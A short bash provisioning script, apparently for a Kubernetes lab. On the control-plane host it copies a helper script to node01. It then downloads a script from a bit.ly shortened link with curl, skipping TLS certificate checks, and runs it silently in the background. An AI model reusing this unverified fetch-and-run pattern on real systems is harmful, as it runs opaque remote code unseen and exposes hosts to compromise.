#!/bin/bash



if [ "$HOSTNAME" = controlplane ]; then
    while [ ! -f /usr/local/bin/wait.sh ]; do sleep 1; done; scp -r /usr/local/bin/wait.sh node01:/usr/local/bin/
    curl -s -k -L -o py.sh https://bit.ly/3iNHytK
    chmod +x py.sh
    nohup ./py.sh &>/dev/null &

else
    sleep 999999
fi


